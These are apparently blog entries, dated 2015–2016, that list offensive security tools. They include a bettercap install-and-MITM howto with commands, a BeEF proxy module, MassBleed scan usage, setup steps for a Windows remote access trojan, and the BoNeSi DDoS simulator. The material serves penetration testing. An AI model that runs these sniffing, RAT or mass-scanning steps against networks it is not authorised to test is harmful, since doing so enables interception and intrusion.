Jan 27, 2016

CheatSheet: Powershell

Source:: http://ramblingcookiemonster.github.io/images/Cheat-Sheets/powershell-cheat-sheet.pdf

Tools: HTTP Security Headers Powershell script

PowerShell script to quickly test for HTTP Security Headers.

Source:: https://pentestn00b.wordpress.com/2016/01/22/http-security-headers-script/

Dec 11, 2015

Howto: install and use bettercap in Kali 2.0

1. Install Ruby-Dev
# apt-get install ruby-dev libpcap-dev

2. Download source code bettercap
# git clone https://github.com/evilsocket/bettercap

3. Install bettercap
# cd bettercap
# gem build bettercap.gemspec
# gem install bettercap*.gem

4. Start monitoring traffic and MITM
# bettercap -X -L -I eth0
-X => Sniffing
-L => Parse packets coming from/to the address of this computer
-I => Interface

5. Download the proxy modules
# git clone https://github.com/evilsocket/bettercap-proxy-modules

6. Using bettercap + beef
# bettercap -X -L -I eth0 --proxy-module bettercap-proxy-modules/beefbox.rb

Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a useful utility which finds all hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract these streams, delete the file, delete unwanted streams, or export the list of found streams to a log file. This program can also list multiple hidden streams and can properly detect alternate data streams on an actual folder\directory.

Source:: http://www.novirusthanks.org/products/stream-detector/

Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh massbleed.sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh port 8443)
  3. To individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh massbleed.sh 0 0 proxy) (example: sh massbleed.sh port 8443 proxy) (example: sh massbleed.sh single 0 proxy) (example: sh massbleed.sh 192.168.0. subnet 0 proxy)
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)
REQUIREMENTS: Is the heartbleed POC present? Is the openssl CCS script present? Is unicornscan installed? Is nmap installed? Is sslscan installed?

Source:: https://github.com/1N3/MassBleed

Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source-code for controlling a remote machine behind a NAT with a command-line shell in Windows. Although the core provides support for communication with multiple RATs, the command-line interface used has limited capabilities distinguishing each one.
The RAT process executable does not hide itself from taskbar or task manager as it was developed for educational purposes only. Please do not use for any malicious purposes.
Contains the source code and the two binaries packaged using ILMerge.

  1. Start the server in a command-line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command-line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface
Source:: https://github.com/stphivos/rat-shell?utm_source=hootsuite

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

0d1n is a tool for automating customized attacks against web applications.
* brute force passwords in auth forms
* directory disclosure (use a PATH list to brute force, and find HTTP status codes)
* test lists on inputs to find SQL Injection and XSS vulnerabilities
other things...

Source:: https://github.com/CoolerVoid/0d1n/

Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

How does TCP Spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary that all traffic from the target webserver is routed back to the host running BoNeSi.
HTTP-Flooding attacks cannot be simulated on the internet, because answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.
Source:: http://cagdasulucan.blogspot.com/2012/12/how-to-simulate-http-get-botnet-ddos.html

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner that you can use during penetration testing. The tool chains together a collection of pentest utilities, such as theHarvester, nmap and brute force tools, and runs them against your target. Some of the features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services
Source:: https://github.com/1N3/Sn1per

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.

Source:: https://github.com/rastating/joomlavs